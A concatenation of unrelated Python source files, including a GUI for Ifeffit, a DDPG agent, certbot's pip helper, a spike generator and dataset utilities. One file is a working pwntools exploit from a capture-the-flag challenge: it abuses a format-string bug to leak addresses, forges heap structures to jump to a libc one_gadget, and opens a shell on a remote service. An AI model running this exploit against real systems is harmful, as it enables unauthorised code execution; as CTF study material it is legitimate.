i = i + 1
if ((i > skip) and (s != 'end macro')):
self.mac_win.insert('end', " %s\n" % s)
self.mac_win.see('end')
def paths_update(self):
self.clear_echo_buffer()
self.iff_com("show @paths")
self.add_echo_lines(self.pth_win, erase=1)
def add_echo_lines(self, win, erase=1):
if (erase == 1): win.delete(0.0, win.index('end') )
buff = self.get_echo_buffer()
for s in buff:
if (win == self.cmd_win):
win.insert('end', "# %s\n" % s, 'output')
elif ((win == self.sca_win) and (s[0:1] == '&')):
pass
elif ((win == self.str_win) and (s[0:2] == '$&')):
pass
else:
win.insert('end', " %s\n" % s)
win.see('end')
def read_datafile(self, master):
ReadDataFile(iff_com=self.do_ifeffit, master=master)
def read_cmndfile(self, master):
ReadCmndFile(iff_com=self.do_ifeffit, master=master)
def write_datafile(self, master):
WriteDataFile(master=master)
def write_cmndfile(self, master):
WriteCmndFile(master=master, buffer = self.inp_buff)
def save_state(self, master):
xfile = tkFileDialog.asksaveasfilename(
filetypes=[("save files","*.sav"),
("all files","*")],
initialfile = 'ifeffit.sav' , parent=master)
xfile = trim_cwd(xfile)
if (xfile != ''):
self.do_ifeffit("save(file=\"%s\")" % xfile)
def restore_state(self, master):
xfile = ""
xfile = tkFileDialog.askopenfilename(
filetypes=[("save files","*.sav"),
("all files","*")], parent=master)
xfile = trim_cwd(xfile)
if (xfile != ''):
self.do_ifeffit("restore(file=\"%s\")" % xfile)
def plotter(self,master):
DataPlotter(iff_com = self.do_ifeffit,
master=master, plot_opts= self.plot_opts)
def set_prefs(self, master):
SetPrefs(master=master, prefs = self.prefs)
def pre_edge(self,master):
PreEdge(iff_com = self.do_ifeffit, master=master)
def autobk(self,master):
Spline(iff_com = self.do_ifeffit, master=master)
def fft(self,master):
Ifft(iff_com = self.do_ifeffit, master=master)
def def_paths(self,master):
Paths(iff_com = self.do_ifeffit, master=master,paths=self.feff_paths)
def macro_editor(self,master):
pass
def exit(self,prompt=1):
res = 'Yes'
if (prompt == 1):
d = Pmw.MessageDialog(self.root,
title = 'Save Ifeffit Session?',
defaultbutton = 0,
buttons = ('Yes', 'No','Cancel'),
message_text =
'Save current state of Ifeffit before Exit?')
res = d.activate()
if (res == 'Yes'):
u = self.save_state(self.root)
if (u == None): res = 'Cancel'
if (res != 'Cancel'):
self.root.destroy()
sys.exit(0)
def help(self):
self.about.show()
if (__name__ == '__main__'):
GIFeffit(load=sys.argv[1:])
| StarcoderdataPython |
3367822 | <reponame>Corb3nik/fixenv
#!/usr/bin/env python2
import sys
import argparse
import binascii
from pwn import *
# python solution.py -e remote ./echoservice -i echo.stillhackinganyway.nl -p 1337
# You need the binary (echoservice) in the same directory
# You need the libc (libc6_2.23-0ubuntu9_amd64.so) with hash 885acc6870b8ba98983e88e578179a2c
def leak_heap():
lookup = "CORB3NIK"
payload = lookup + "%4$p"
p.sendline(payload)
p.recvuntil(lookup)
heap_addr = int(p.recvline().strip()[2:], 16)
return heap_addr
def create_heap_chunk(data):
lookup = "CORB3NIK"
payload = "%4$p" + "CORB" + data
payload += "\x00" * (0x100 - len(payload))
p.sendline(payload)
#leak = p.recvuntil("CORB", drop=True).split(" ", 3)[-1].rjust(8, "\x00")
heap_hint = int(leak, 16)
p.clean()
return heap_hint
def leak_addr(addr):
p.clean()
p.sendline("%13$SCOR" + p64(addr))
leak = p.recvuntil("COR", drop=True).split(" ", 3)[-1]
decoded = leak.decode('utf8')
leak = ""
for c in decoded:
upper = (ord(c) & 0xff00) >> 8
lower = ord(c) & 0xff
leak += chr(lower) + chr(upper)
leak += "\x00"
p.clean()
return leak
def exploit():
# Leak stack
p.sendline("%142$p")
stack = int(p.recvline().split(" ", 3)[-1], 16)
log.info("Stack : 0x%x" % stack)
# Leak binary
code = u64(leak_addr(stack).ljust(8, "\x00"))
log.info("Code segment : 0x%x" % code)
# Leak libc
#libc = u64(leak_addr(stack + 8).ljust(8, "\x00"))
#log.info("Libc : 0x%x" % libc)
# Leak fgets GOT
fgets = u64(leak_addr(code + 2100560).ljust(8, "\x00"))
log.info("fgets() : 0x%x" % fgets)
# Leak __libc_start_main GOT
# LIBC SEEMS TO BE libc6_2.23-0ubuntu9_amd64
#__libc_start_main = u64(leak_addr(code + 2100592).ljust(8, "\x00"))
#log.info("__libc_start_main() : 0x%x" % __libc_start_main)
# Calculate libc base + one_gadget
base = fgets - 0x6dad0
one_gadget = base + 0x4526a
log.info("one_gadget should be at : 0x%x" % one_gadget)
# Leak Heap
heap = u64(leak_addr(base+0x3c48e8).ljust(8, '\x00'))
log.info("heap : 0x%x" % heap)
### Actual WORKING exploit ###
### Two values need to be changed, scroll down.
# Setup fake objc_object pointer
next_chunk = heap + 247 # <==== Change the second value here
dtable = next_chunk + 0x100
bucket_pointers = dtable + 0x50
buckets = bucket_pointers + 0x100
log.info("Next heap chunk : 0x%x" % next_chunk)
payload = ""
payload += "\x00" * 0x108 # padding
# objc_class struct start
payload += p64(next_chunk)
payload += "R" * 0x38 # useless
payload += p64(dtable) # struct sarray* dtable value
payload += "R" * 0xb8
log.info("dtable : 0x%x" % dtable)
# dtable start
payload += p64(bucket_pointers) # struct sbucket** bucket_pointers
payload += "R" * 0x20
payload += p64(0x1337) # dtable size?
payload += "R" * 0x20
log.info("Bucket pointers : 0x%x" % bucket_pointers)
# bucket pointer list
payload += p64(0x1337) * 0x3
payload += p64(buckets) # bucket pointer
payload += p64(0x1337) * 0x0f
payload += "R" * 0x68
log.info("Buckets : 0x%x" % bucket_pointers)
# bucket list
payload += p64(one_gadget) * 0x14 # <==== Change this for 1337 RIP controle
payload += "R" * (0x350 - len(payload))
p.sendline(payload)
p.recvline()
## TESTING ##
#print repr(leak_addr(next_chunk))
#print repr(leak_addr(next_chunk+0x40))
#payload = "%13$p" + "AAA" + p64(next_chunk+8) # DEBUG
payload = "%13$@" + "AAA" + p64(next_chunk)
p.sendline(payload)
p.sendline("cat /flag")
p.interactive()
if __name__ == '__main__':
# Argument parser
parser = argparse.ArgumentParser(description='Exploit Dev Template')
parser.add_argument('binary', help="Binary to exploit")
parser.add_argument('-e', '--env', choices=['local', 'remote'],
help='Default : local',
default='local')
parser.add_argument('-i', help="remote IP")
parser.add_argument('-p', help="remote port")
args = parser.parse_args()
# Validate that an IP and port has been specified for remote env
if args.env == "remote" and (args.i == None or args.p == None):
print "%s : missing IP and/or port" % sys.argv[0]
exit()
# Load the binary
try:
binary = ELF(args.binary)
except:
log.warn("Issue opening %s" % args.binary)
exit()
try:
libc = binary.libc
except:
log.warn("Libc not loaded.")
env = args.env
loot = {}
if env == "local":
p = process([args.binary], env={"LD_PRELOAD":"./libc6_2.23-0ubuntu9_amd64.so"})
log.info(util.proc.pidof(p))
elif env == "remote":
p = remote(args.i, args.p)
pause()
exploit()
| StarcoderdataPython |
117288 | <filename>ddpg-bipedal/pytorch-imp/MyAgent.py
import numpy as np
import torch
import torch.nn.functional as F
from MyModel import *
import copy
from collections import deque, namedtuple
import random
# import heapq
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
class ReplayBuffer():
def __init__(self, sample_size, max_len=int(1e5)):
self.buffer = deque(maxlen=max_len)
self.sample_size = sample_size
self.experience = namedtuple('experience', ('state', 'action', 'reward', 'next_state', 'done'))
def add(self, state, action, reward, next_state, done):
exp = self.experience(state, action, reward, next_state, done)
# here using exception handler to avoid unnecessary overhead in general
# try:
# if len(self.buffer) <= self.max_len:
# heapq.heappush(self.buffer, [error, exp])
# else:
# heapq.heapreplace(self.buffer, [error, exp])
# except(ValueError):
# errors = [item[0] for item in self.buffer]
# new_error_fn = lambda: error + random.uniform(1e-6, 1e-5)
# new_error = new_error_fn()
# while new_error in errors:
# new_error = new_error_fn()
# assert new_error not in errors, 'The error is already in the buffer.'
# if len(self.buffer) <= self.max_len:
# heapq.heappush(self.buffer, [new_error, exp])
# else:
# heapq.heapreplace(self.buffer, [new_error, exp])
self.buffer.append(exp)
def sample(self):
# _, exps = zip(*random.sample(self.buffer, self.sample_size))
exps = random.sample(self.buffer, self.sample_size)
states = torch.from_numpy(np.vstack([e.state for e in exps if e is not None])).float().to(device)
actions = torch.from_numpy(np.vstack([e.action for e in exps if e is not None])).float().to(device)
rewards = torch.from_numpy(np.vstack([e.reward for e in exps if e is not None])).float().to(device)
next_states = torch.from_numpy(np.vstack([e.next_state for e in exps if e is not None])).float().to(device)
dones = torch.from_numpy(np.vstack([e.done for e in exps if e is not None]).astype(np.uint8)).float().to(device)
return states, actions, rewards, next_states, dones
def __len__(self):
return len(self.buffer)
class Agent():
def __init__(self, state_size, action_size, batch_size=64,
actor_alpha=1e-4, critic_alpha=3e-4, gamma=0.9, tau=1e-3,
weight_decay=1e-4, actor_file=None, critic_file=None):
# hyperparameters
self.gamma = gamma
self.tau = tau
self.noise_decay = 1 + 5e-6
# env info
self.state_size = state_size
self.action_size = action_size
# replay buffer
self.buffer = ReplayBuffer(sample_size=batch_size)
# actor-critic
self.actor_main = Actor(state_size, action_size, param_file=actor_file).to(device)
self.critic_main = Critic(state_size, action_size, param_file=critic_file).to(device)
# target actor-critic
self.actor_target = copy.deepcopy(self.actor_main)
self.critic_target = copy.deepcopy(self.critic_main)
# optimizer
self.actor_optimizer = torch.optim.Adam(self.actor_main.parameters(), lr=actor_alpha)
self.critic_optimizer = torch.optim.Adam(self.critic_main.parameters(), lr=critic_alpha, weight_decay=weight_decay)
def act(self, state):
state = torch.from_numpy(state).float().to(device)
# add noise to parameters
saved_params = []
for param in self.actor_main.parameters():
saved_params.append(copy.deepcopy(param))
            # add the noise in place via .data so the perturbation actually reaches the forward pass
            param.data.add_(torch.normal(mean=0.0, std=torch.ones_like(param) / (10 * self.noise_decay)))
self.noise_decay *= 1 + 5e-6
self.actor_main.eval()
with torch.no_grad():
action = self.actor_main(state).cpu().numpy()
self.actor_main.train()
# restore parameters
for param, saved_param in zip(self.actor_main.parameters(), saved_params):
            # restore the saved weights in place (plain rebinding would leave the noise in)
            param.data.copy_(saved_param.data)
return np.clip(action, -1, 1)
def step(self, state, action, reward, next_state, done):
# compute error used as the priority number of priority queue
# state_tensor = torch.from_numpy(np.reshape(state, (1, -1))).float().to(device)
# action_tensor = torch.from_numpy(np.reshape(action, (1, -1))).float().to(device)
# next_state_tensor = torch.from_numpy(np.reshape(next_state, (1, -1))).float().to(device)
#
# self.actor_main.eval()
# self.critic_main.eval()
# with torch.no_grad():
# value = self.critic_main(state_tensor, action_tensor).cpu().numpy()
# next_action_tensor = self.actor_main(next_state_tensor)
# next_value = self.critic_main(next_state_tensor, next_action_tensor).cpu().numpy()
# self.actor_main.train()
# self.critic_main.train()
#
# error = reward + (1 - done) * self.gamma * next_value - value
#
# error = error.item()
self.buffer.add(state, action, reward, next_state, done)
if len(self.buffer) > self.buffer.sample_size + 100:
self._learn()
def _learn(self):
states, actions, rewards, next_states, dones = self.buffer.sample()
targets = rewards + (1 - dones) * self.gamma * self.critic_target(next_states, self.actor_target(next_states)).detach()
critic_loss = F.mse_loss(self.critic_main(states, actions), targets)
actor_loss = -self.critic_main(states, self.actor_main(states)).mean()
# update critic
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
# update actor
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
# update the target networks
self._moving_average(self.actor_main, self.actor_target)
self._moving_average(self.critic_main, self.critic_target)
def _moving_average(self, main, target):
for target_param, main_param in zip(target.parameters(), main.parameters()):
target_param.data.copy_(self.tau * main_param.data + (1.0 - self.tau) * target_param.data)
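# Minimal interaction-loop sketch for this agent. It assumes the classic Gym API
# (env.step returning 4 values) and that 'BipedalWalker-v3' is available; adjust the
# calls for gymnasium-style environments.
if __name__ == '__main__':
    import gym

    env = gym.make('BipedalWalker-v3')
    agent = Agent(state_size=env.observation_space.shape[0],
                  action_size=env.action_space.shape[0])
    for episode in range(3):  # tiny smoke run, not a full training schedule
        state = env.reset()
        score = 0.0
        for t in range(200):
            action = agent.act(state)
            next_state, reward, done, _ = env.step(action)
            agent.step(state, action, reward, next_state, done)  # store and (maybe) learn
            state = next_state
            score += reward
            if done:
                break
        print('episode %d  score %.2f' % (episode, score))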
| StarcoderdataPython |
3272000 | <filename>reference_book/api/filters.py
from rest_framework import filters
class CustomSearchFilter(filters.SearchFilter):
search_param = 'q'
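# Usage sketch: wiring the filter into a DRF view so clients search with ?q=<term>
# instead of the default ?search=<term>. The Company model/serializer are hypothetical.
#
# from rest_framework import viewsets
#
# class CompanyViewSet(viewsets.ModelViewSet):
#     queryset = Company.objects.all()
#     serializer_class = CompanySerializer
#     filter_backends = [CustomSearchFilter]
#     search_fields = ["name", "address"]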
| StarcoderdataPython |
1766158 | <reponame>qyl2021/certbot<filename>tools/pip_install.py
#!/usr/bin/env python
# pip installs packages using pinned package versions. If CERTBOT_OLDEST is set
# to 1, a combination of tools/oldest_constraints.txt and
# tools/dev_constraints.txt is used, otherwise, tools/requirements.txt is used.
from __future__ import absolute_import
from __future__ import print_function
import contextlib
import os
import re
import shutil
import subprocess
import sys
import tempfile
import merge_requirements as merge_module
import readlink
# Once this code doesn't need to support Python 2, we can simply use
# tempfile.TemporaryDirectory.
@contextlib.contextmanager
def temporary_directory():
dirpath = tempfile.mkdtemp()
try:
yield dirpath
finally:
shutil.rmtree(dirpath)
def find_tools_path():
return os.path.dirname(readlink.main(__file__))
def certbot_oldest_processing(tools_path, constraints_path):
# The order of the files in this list matters as files specified later can
# override the pinnings found in earlier files.
pinning_files = [os.path.join(tools_path, 'dev_constraints.txt'),
os.path.join(tools_path, 'oldest_constraints.txt')]
with open(constraints_path, 'w') as fd:
fd.write(merge_module.main(*pinning_files))
def certbot_normal_processing(tools_path, constraints_path):
repo_path = os.path.dirname(tools_path)
requirements = os.path.normpath(os.path.join(
repo_path, 'tools/requirements.txt'))
shutil.copy(requirements, constraints_path)
def call_with_print(command, env=None):
if not env:
env = os.environ
print(command)
subprocess.check_call(command, shell=True, env=env)
def pip_install_with_print(args_str, env=None):
if not env:
env = os.environ
command = ['"', sys.executable, '" -m pip install --disable-pip-version-check ', args_str]
call_with_print(''.join(command), env=env)
def main(args):
tools_path = find_tools_path()
with temporary_directory() as working_dir:
if os.environ.get('CERTBOT_NO_PIN') == '1':
# With unpinned dependencies, there is no constraint
pip_install_with_print(' '.join(args))
else:
# Otherwise, we merge requirements to build the constraints and pin dependencies
constraints_path = os.path.join(working_dir, 'constraints.txt')
if os.environ.get('CERTBOT_OLDEST') == '1':
certbot_oldest_processing(tools_path, constraints_path)
else:
certbot_normal_processing(tools_path, constraints_path)
env = os.environ.copy()
env["PIP_CONSTRAINT"] = constraints_path
pip_install_with_print(' '.join(args), env=env)
if __name__ == '__main__':
main(sys.argv[1:])
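# Example invocations (sketch; the exact package arguments depend on the checkout):
#   python tools/pip_install.py -e acme -e certbot
#   CERTBOT_OLDEST=1 python tools/pip_install.py certbot-apache
#   CERTBOT_NO_PIN=1 python tools/pip_install.py requests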
| StarcoderdataPython |
3295915 | # Copyright 2017. <NAME>. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import pandas as pd
import numpy as np
import csv
import h5py
from six import string_types
from bmtk.utils import sonata
class Rates(object):
def __iter__(self):
return self
def __next__(self):
raise StopIteration
next = __next__ # For Python 2
class NormalRates(Rates):
def __init__(self, t_start, t_end, rate_mu, rate_sigma=5.0):
self.t_start = t_start
self.t_end = t_end
self.period_mu = 1.0/float(rate_mu)
self.period_sigma = 1.0/float(rate_mu + rate_sigma)
self._current_t = t_start
def __next__(self):
self._current_t += abs(np.random.normal(self.period_mu, self.period_sigma))
if self._current_t > self.t_end:
self._current_t = self.t_start
raise StopIteration
else:
return self._current_t
next = __next__ # For Python 2
class SpikesGenerator(object):
def __init__(self, nodes, populations=None, t_min=0, t_max=1.0):
self._t_min = t_min
self._t_max = t_max
if isinstance(nodes, string_types):
nodes_h5 = h5py.File(nodes, 'r')
nodes_grp = nodes_h5['/nodes']
if populations is None:
populations = nodes_grp.keys()
# TODO: Need a way to Use sonata library without having to use node-types
nodes = []
for node_pop in populations:
nodes.extend(nodes_grp[node_pop]['node_id'])
self._nodes = {n: Rates() for n in nodes}
def set_rate(self, firing_rate, gids=None, t_start=None, t_end=None):
t_start = t_start or self._t_min
assert(t_start >= self._t_min)
t_end = t_end or self._t_max
assert(t_end <= self._t_max)
gids = gids or self._nodes.keys()
for gid in gids:
self._nodes[gid] = NormalRates(t_start, t_end, firing_rate)
def save_csv(self, csv_file_name, in_ms=False):
conv = 1000.0 if in_ms else 1.0
with open(csv_file_name, 'w') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=' ')
csv_writer.writerow(['gid', 'spike-times'])
for gid, rate_gen in self._nodes.items():
csv_writer.writerow([gid, ','.join(str(r*conv) for r in rate_gen)])
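# Small usage sketch: drive a handful of virtual node ids at ~15 Hz and dump the spike
# trains to CSV. Plain integer ids are passed here; a SONATA nodes .h5 path would work too.
if __name__ == '__main__':
    sg = SpikesGenerator(nodes=range(5), t_min=0.0, t_max=2.0)
    sg.set_rate(15.0)  # normally-jittered inter-spike intervals around 1/15 s
    sg.save_csv('virtual_spikes.csv', in_ms=True)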
| StarcoderdataPython |
157583 | """Estimation of lambdaN"""
import matplotlib.pyplot as plt
import networkx as nx
from numpy import *
import scipy
def maximum_eigen():
list1 = []
list2 = []
for i in range(10, 31):
for j in range(0, 10):
G1 = nx.barabasi_albert_graph(500, i, seed=j)
degree_sequence = [d for n, d in G1.degree()]
            max_degree = max(degree_sequence)  # estimator: lambda^(N) is approximated by the maximum degree
            lap_matrix = nx.laplacian_matrix(G1).todense()
            eigval = scipy.linalg.eigvalsh(lap_matrix)  # Laplacian is symmetric, so eigenvalues are real and sorted
            eig_max = eigval[-1]
            list1.append(max_degree)
            list2.append(float(eig_max))
#print(list1)
#print(list2)
return list1, list2
estimation, maxeigen = maximum_eigen()
print(estimation)
print(maxeigen)
plt.scatter(maxeigen, estimation, c='b', s=6., label=r'Estimation of $\lambda^{(N)}$')
plt.plot(maxeigen, maxeigen, c='y', label = r'$\lambda^{(N)}$')
plt.xlabel(r'$\lambda^{(N)}$')
plt.ylabel(r'estimate $\lambda^{(N)}$')
plt.legend()
plt.savefig('estimation_accuracy_maxeigen.pdf')
plt.show()
| StarcoderdataPython |
191919 | <gh_stars>10-100
from abc import ABC, abstractmethod
from typing import Generator, Type
from open_sea_v1.endpoints.client import ClientParams
from open_sea_v1.responses.abc import BaseResponse
class BaseEndpoint(ABC):
@property
@abstractmethod
def __post_init__(self):
"""Using post_init to run param validation"""
@property
@abstractmethod
def client_params(self) -> ClientParams:
"""Instance of common OpenSea Endpoint parameters."""
@property
@abstractmethod
def _response_type(self) -> Type[BaseResponse]:
""""""
@property
@abstractmethod
def url(self) -> str:
"""Endpoint URL"""
@abstractmethod
def _parse_json(self) -> Generator[list[list[BaseResponse]], None, None]:
"""Returns all pages for the query."""
@property
@abstractmethod
def get_params(self) -> str:
"""Endpoint URL"""
@property
@abstractmethod
def _validate_request_params(self) -> None:
""""""
| StarcoderdataPython |
3278847 | import os
from jennie.ubuntu.nginxfiles import *
def install_phpmyadmin():
os.system("wget https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.gz")
os.system("tar -xvf phpMyAdmin-5.1.0-all-languages.tar.gz")
os.system("mv phpMyAdmin-5.1.0-all-languages /var/www/html/phpmyadmin")
os.system("rm -rf phpMyAdmin-5.1.0-all-languages.tar.gz")
nginx_config = DEFAULT_PHPMYADMIN_CONF
open("/etc/nginx/conf.d/default.conf", "w").write(nginx_config)
os.system("systemctl reload nginx")
    print ('''\n\nphpmyadmin is up and running at http://YOURIP/phpmyadmin/.\n\n''')
| StarcoderdataPython |
4800909 | <filename>airwaveapiclient/tests/test_apdetail.py
# -*- coding: utf-8 -*-
"""UnitTests for airwaveapiclient."""
import os
import unittest
from airwaveapiclient import APDetail
from airwaveapiclient.tests import test_utils
class APDetailUnitTests(unittest.TestCase):
"""Class APDetailUnitTests.
Unit test for APDetail.
"""
def setUp(self):
"""Setup."""
self.ap_detail_file = 'test_apdetail.xml'
self.here = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(self.here, self.ap_detail_file)
self.ap_detail = test_utils.read_file(path)
self.obj = APDetail(self.ap_detail)
def tearDown(self):
"""Tear down."""
def test_init(self):
"""Test init."""
self.assertNotEqual(self.obj, None)
def test_radio_type(self):
"""Test radio_type."""
for radio in self.obj['radio']:
if radio['radio_type'] == 'bgn':
self.assertEqual(radio['radio_interface'], '2')
if radio['radio_type'] == 'aN':
self.assertEqual(radio['radio_interface'], '1')
| StarcoderdataPython |
3327454 | # HEAD
# Modules - Creating and using directory module as package
# DESCRIPTION
# Describes the usage of package init.py file with other file module
# Imports file module explicitly - bypasses __init__.py scoping
# Imports also uses alias for the imported file module
# Describes usage of import statements
# and using a directory + function as a package
# Creating __init__.py to create a package
# RESOURCES
#
# Just defining what has to be exported using the __all__ variable
# Please remember the importing file can bypass this by
# explicitly accessing the unexported and unscoped file module
__all__ = ['print']
# To remove modules just remove the name of the module from the array of modules to be exported
# __all__ = []
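#
# Hedged illustration (added): how the __all__ list above plays out for a consumer module.
# The package and module names below are hypothetical.
#
#   # consumer.py
#   from mypackage import *        # star-import only binds the names listed in __all__ (here: 'print')
#   import mypackage.hidden_mod    # an explicit import still works and bypasses the __all__ scoping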
| StarcoderdataPython |
1689458 | <gh_stars>1-10
import tensorflow as tf
import numpy as np
from tensorflow.keras import layers
class SIR_Cell(layers.Layer):
def __init__(self, population, **kwargs):
'''
Initialization of the Cell. state_size and output_size are mandatory elements.
        Since this is a simple Markov chain, there is no hidden state beyond the (S, I, R) values themselves.
        The size of the output is 3 (S, I, R).
'''
self.state_size = 3
self.output_size = 3
self.Population = population
# self.gamma = tf.constant(gamma, shape=(1,), dtype=tf.float32, name='gamma')
super(SIR_Cell, self).__init__(**kwargs)
def build(self, input_shape):
self.beta = self.add_weight(shape=(1,),
initializer='uniform', name='beta')
self.gamma = self.add_weight(shape=(1,),
initializer='uniform', name='gamma')
        self.built = True  # mark the layer as built (Keras convention)
def call(self, inputs, states):
'''
inputs are (batch, input_size)
states are (batch, state_size)
'''
S = states[0][:,0]
I = states[0][:,1]
R = states[0][:,2]
S_next = S - inputs[:,0]*inputs[:,1]*S*I*self.beta/self.Population
I_next = I + inputs[:,0]*inputs[:,1]*S*I*self.beta/self.Population - inputs[:,1]*self.gamma*I
R_next = R + inputs[:,1]*self.gamma*I
prediction = tf.stack([S_next, I_next, R_next], axis=1)
next_state = tf.stack([S_next, I_next, R_next], axis=1)
return prediction, next_state
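def example_sir_rnn(population=1000000.0, timesteps=100):
    """Hedged usage sketch (added): wrap SIR_Cell in a Keras RNN layer.

    The inputs are illustrative only: a (batch, time, 2) tensor whose two channels are the
    per-step control signals read by SIR_Cell.call, plus an initial (S, I, R) state with a
    single infected individual.
    """
    cell = SIR_Cell(population)
    rnn = layers.RNN(cell, return_sequences=True)
    inputs = tf.ones((1, timesteps, 2))                              # dummy control inputs
    initial_state = tf.constant([[population - 1.0, 1.0, 0.0]])      # (S, I, R) at t=0
    return rnn(inputs, initial_state=[initial_state])                # (1, timesteps, 3) trajectory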
def main():
return -1
if __name__ == '__main__':
# Do nothing
    main()
| StarcoderdataPython |
1708111 | <filename>src/evoml/framework/datasets/_base.py
from genericpath import exists
from math import e
from os import environ, listdir, makedirs, rmdir, path
from os.path import dirname, expanduser, isdir, join, splitext, basename
from typing import Tuple
import pandas as pd
import shutil
from scipy.sparse import data
from sklearn.model_selection import train_test_split
import numpy as np
from pathlib import Path
import logging
from .. import datasets
def _set_data_home(data_home=None):
if data_home is None:
data_home = join('~', 'evoml_framework_data')
environ["EVOML_FRAMEWORK_DATA"] = data_home
def _load(train_file, test_file, name):
if not exists(train_file) or \
(test_file is not None and not exists(test_file)):
raise IOError("Dataset missing! %s" % name)
train_dataset = np.genfromtxt(train_file, delimiter=',', dtype=np.int32)
test_dataset = np.genfromtxt(test_file, delimiter=',', dtype=np.int32)
return train_dataset, test_dataset
def _to_dense(data):
X_train, y_train, X_test, y_test = data
X_train = X_train.toarray()
if X_test is not None:
X_test = X_test.toarray()
return X_train, y_train, X_test, y_test
def _read_experiment_details(data_file, column_names, prefix, offset):
# Delimiter
data_file_delimiter = ','
# The max column count a line in the file could have
largest_column_count = 0
# Loop the data lines
with open(data_file, 'r') as temp_f:
# Read the lines
lines = temp_f.readlines()
for l in lines:
# Count the column count for the current line
column_count = len(l.split(data_file_delimiter)) + 1
# Set the new most column count
largest_column_count = column_count if largest_column_count < column_count else largest_column_count
# Generate column names (will be 0, 1, 2, ..., largest_column_count - 1)
cl_names = column_names + [prefix + str(i) for i in range(0, largest_column_count-offset)]
# Read csv
return pd.read_csv(data_file, header=None, delimiter=data_file_delimiter, names=cl_names, dtype=object)[1:]
# def _get_df_with_different_columns(data_file):
# # Delimiter
# data_file_delimiter = ','
# # The max column count a line in the file could have
# largest_column_count = 0
# # Loop the data lines
# with open(data_file, 'r') as temp_f:
# # Read the lines
# lines = temp_f.readlines()
# for l in lines:
# # Count the column count for the current line
# column_count = len(l.split(data_file_delimiter)) + 1
# # Set the new most column count
# largest_column_count = column_count if largest_column_count < column_count else largest_column_count
# # Generate column names (will be 0, 1, 2, ..., largest_column_count - 1)
# column_names = ['Dataset', 'Optimizer', 'objfname', 'k'] + ['label' + str(i) for i in range(0, largest_column_count-4)]
# # Read csv
# return pd.read_csv(data_file, header=None, delimiter=data_file_delimiter, names=column_names, dtype=object)[1:]
def load_dataset(name):
data_home = get_data_home()
train_file = join(data_home, name, "train.csv")
test_file = join(data_home, name, "test.csv")
    return _to_dense(_load(train_file, test_file, name))
def get_data_home(data_home=None) -> str:
"""Return the path of the evoml-framework data dir.
"""
if data_home is None:
# data_home = environ.get('EVOML_FRAMEWORK_DATA',
# join('~', 'evoml_framework_data'))
# print(datasets.__path__)
data_home = join(datasets.__path__[0],"data")
print(data_home)
# update new path
data_home = expanduser(data_home)
makedirs(data_home, exist_ok=True)
return data_home
def clear_data_home(data_home=None):
"""Delete all the content of the data home cache.
"""
data_home = get_data_home(data_home)
shutil.rmtree(data_home)
def split_dataset(src, dst=None, ratio=0.3, cluster=False):
""" divide a dataset into train and test sets
"""
if (dst is None):
dst = join(dirname(src), splitext(basename(src))[0])
shutil.rmtree(dst, ignore_errors=True)
makedirs(dst, exist_ok=True)
df = pd.read_csv(src)
X = df.iloc[:, 0:(len(df.columns)-1)]
y = df.iloc[:, -1]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=ratio)
pd.concat([X_train, y_train], axis=1).to_csv(
join(dst, 'train.csv'), header=False, index=False)
pd.concat([X_test, y_test], axis=1).to_csv(
join(dst, 'test.csv'), header=False, index=False)
if (cluster is True):
pd.concat([X_train, y_train], axis=1).to_csv(join(Path(dst).parent, basename(src)), header=False, index=False)
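def _example_split_dataset():
    """Hedged usage sketch (added): split a labelled CSV into train/test files.

    The input path is hypothetical; split_dataset writes train.csv and test.csv into a folder
    named after the source file.
    """
    split_dataset("/tmp/iris.csv", ratio=0.3)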
def get_dataset(dataset_folder, data_file):
# dataset_folder = path.join(datasets.get_data_home(), dataset_folder)
# print("folder"+ dataset_folder)
return np.genfromtxt(join(
dataset_folder, data_file), delimiter=',', dtype=np.int32)
def get_data_frame_frome_experiment_details_by_dataset(evo_folder, dataset):
experiment_details_Labels_file = join(Path(evo_folder), "experiment_details_Labels.csv")
experiment_details_file = join(Path(evo_folder), "experiment_details.csv")
iterations = _read_experiment_details(experiment_details_file, ["Dataset","Optimizer","objfname","k","ExecutionTime","SSE","Purity","Entropy","HS","CS","VM","AMI","ARI","Fmeasure","TWCV","SC","Accuracy","DI","DB","STDev"], "Iter", 20)
iterations = iterations.loc[iterations['Dataset'] == dataset]
iterations = iterations.iloc[:,20:]
df = _read_experiment_details(experiment_details_Labels_file, ['Dataset', 'Optimizer', 'objfname', 'k'],"label", 4)
df = df.loc[df['Dataset'] == dataset]
df = df.dropna(axis=1, how='all')
iterations = iterations.dropna(axis=1, how='all')
df0 = df.iloc[:,1:3]
df1 = df.iloc[:, 4:]
df2 = df.iloc[:, 3:4]
_re_index(df0)
_re_index(df1)
_re_index(df2)
_re_index(iterations)
print(iterations)
return df0, df1, df2, iterations
def _re_index(df):
